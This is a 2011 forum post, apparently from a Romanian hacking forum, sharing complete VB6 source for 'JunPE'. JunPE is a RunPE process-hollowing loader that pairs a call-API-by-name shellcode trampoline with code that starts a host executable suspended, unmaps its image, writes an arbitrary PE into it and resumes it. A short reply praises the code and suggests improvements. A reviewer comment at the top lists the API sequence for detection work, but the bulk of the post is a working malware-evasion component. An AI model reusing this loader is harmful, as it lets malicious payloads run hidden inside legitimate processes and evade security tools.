' Forum post by Nytro, June 15, 2011: [VB6] RunPe + CallApiByName (JunPE)
' Product: JunPE
' Description: RunPe + CallApiByName
' Author: Jhonjhon_123 - [J.J.G.P]
'
' NOTE(review): this module is a textbook x86 "process hollowing" loader written in VB6. For
' detection engineering, the observable API sequence issued by the host process is:
'   CreateProcessW(CREATE_SUSPENDED) -> NtUnmapViewOfSection -> VirtualAllocEx(RWX) ->
'   WriteProcessMemory (headers, then every section) -> GetThreadContext -> WriteProcessMemory (PEB) ->
'   SetThreadContext -> ResumeThread, all against the same freshly created child.
' Statically, the only names in the import table are RtlMoveMemory, CallWindowProcA, GetProcAddress
' and LoadLibraryA; every other API above is resolved by name at runtime through Call_() below.
Option Explicit
' ****************************************************************************************************************************** '
'
' --- Author: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Description: RunPe + CallApiByName
' --- Distribution: Free
' --- Terms of use:
' --- Commercial sale is prohibited.
' --- The credits must not be removed.
'
' --- Functions:
' --- IniciarDDLL()
' - Initialises the configuration
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: Path to the exe
' * bBytes: Bytes to execute
'
' ****************************************************************************************************************************** '

' The only four statically imported APIs of the module (see the review note above).
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

' 37-byte x86 stub filled in by IniciarDDLL() and executed by MoveMemory() via CallWindowProcA.
Dim bMoveMem(36) As Byte

' Fills bMoveMem with a small x86 routine: it decodes to a rep movsd / rep movsb copy of the third
' stack argument's worth of bytes from the second argument to the first, ending in ret 10h.
' Must run before MoveMemory()/ExecuteBytes(), otherwise CallWindowProcA jumps into a zeroed buffer.
Public Sub IniciarDDLL()
    Dim vTMP As Variant
    Dim D As Long
    For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
        bMoveMem(D) = CByte(vTMP): D = D + 1
    Next
End Sub

' By Cobein
' Generic "call API by name": resolves sLib!sMod with LoadLibraryA/GetProcAddress, builds a stdcall
' trampoline in a local Byte array and runs it through CallWindowProcA.
'   sLib   - DLL name passed to LoadLibraryA
'   sMod   - export name passed to GetProcAddress
'   Params - arguments, each converted with CLng() and pushed right-to-left
' Returns the callee's EAX, or 0 when the export could not be resolved. "On Error Resume Next"
' means a bad Params element (non-numeric Variant) is silently skipped rather than reported.
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    On Error Resume Next
    Dim lPtr As Long
    Dim bvASM(&HEC00& - 1) As Byte  ' stack buffer holding the generated trampoline
    Dim i As Long
    Dim lMod As Long
    lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
    If lMod = 0 Then Exit Function
    lPtr = VarPtr(bvASM(0))
    ' 58 59 59 59 / 59 50: pop the return address and the four dummy CallWindowProcA
    ' arguments, then push the return address back.
    RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
    ' 68 imm32 for every parameter, last parameter first (stdcall order).
    For i = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
        RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
    Next
    ' E8 rel32: call the resolved export (relative to the byte after the call instruction).
    RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
    RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
    ' C3: return into CallWindowProcA with the callee's result in EAX.
    RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
    Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function

' By Strike Bot
' Copies cBytes bytes from lpSource to lpDestino by executing the bMoveMem stub (see IniciarDDLL).
' Both pointers are raw addresses in the current process; nothing is validated.
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
    Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub

' By Jhonjhon_123
' RunPE / process hollowing: starts sName suspended, unmaps its image, writes the PE held in
' bBytes at that PE's preferred ImageBase, points the initial thread at the new entry point and
' resumes it.
'   sName  - path of the host executable passed to CreateProcessW
'   bBytes - raw bytes of a 32-bit PE image (headers + sections, file layout)
' No relocations are applied, so the image is written at the ImageBase from its optional header.
' "On Error Resume Next" suppresses every failure (bad offsets, unresolved API, failed write):
' a malformed bBytes simply produces a suspended or crashed child instead of an error.
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
    On Error Resume Next
    Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER
    Dim bInh(247) As Byte ' IMAGE_NT_HEADERS
    Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER
    Dim bPi(15) As Byte ' PROCESS_INFORMATION
    Dim bSi(67) As Byte ' STARTUPINFO
    Dim bCtx(203) As Byte ' CONTEXT86
    Dim e_lfanew As Long
    Dim ImageBase As Long
    Dim hProcess As Long
    Dim hThread As Long
    Dim SizeOfImage As Long
    Dim SizeOfHeaders As Long
    Dim AddressOfEntryPoint As Long
    Dim NumberOfSections As Integer
    Dim VirtualAddress As Long
    Dim PointerToRawData As Long
    Dim SizeOfRawData As Long
    Dim Ebx As Long
    Dim Eax As Long
    Dim lTemp As Long
    Dim D As Long
    ' STARTUPINFO.cb = 68 and CONTEXT.ContextFlags = &H10007 (CONTEXT_FULL on x86).
    lTemp = 68
    MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
    lTemp = &H10007
    MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
    ' Parse the payload headers: e_lfanew at DOS offset 60, then fields of IMAGE_NT_HEADERS
    ' (NumberOfSections at 6, AddressOfEntryPoint at 40, ImageBase at 52, SizeOfImage at 80,
    ' SizeOfHeaders at 84). e_lfanew comes straight from the input; no bounds check.
    MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
    MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
    MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
    MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
    MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
    MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
    MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
    MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
    ' Host started with dwCreationFlags = &H4 (CREATE_SUSPENDED); hProcess/hThread are the
    ' first two DWORDs of PROCESS_INFORMATION.
    Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
    MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
    MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
    ' Unmap whatever the host had at the payload's preferred base, then reserve+commit
    ' (&H1000 Or &H2000) SizeOfImage bytes there as PAGE_EXECUTE_READWRITE (&H40).
    Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
    Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
    ' Headers first, then each 40-byte IMAGE_SECTION_HEADER (VirtualAddress at 12,
    ' SizeOfRawData at 16, PointerToRawData at 20) drives one raw-data copy into the child.
    Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
    For D = 0 To NumberOfSections - 1
        MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
        MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
        MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
        MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
        Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
    Next
    ' Thread context: Ebx lives at CONTEXT offset 164 and Eax at 176. For a suspended initial
    ' thread Ebx holds the PEB pointer, so the write at Ebx + 8 updates PEB.ImageBaseAddress;
    ' Eax is the address the loader will jump to, set here to the payload's entry point.
    Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
    MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
    Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
    lTemp = ImageBase + AddressOfEntryPoint
    MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
    Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
    Call Call_("kernel32", "ResumeThread", hThread)
End Sub

' Sursa: RunPe + CallApiByName (JunPE)
me.mello Posted June 15, 2011: Ce e mai frumos decat MoveMemory si CopyMemory :X Super, deja am idei de a imbunatati ExecuteBytes; ai postat si ceva de genul asta in C++, daca nu ma insel. Cam sacadeaza functia... nu vad ZeroMemory sau CloseHandle la hProcess sau hThread, dar probabil a facut el versiunea standard; cand lucrezi cu astfel de functii le mai dai si free la urma, MoveMemory e o functie destul de volatila, mai ales in VB. Oricum e super functia, e altceva fata de ce mai vazusem in trecut.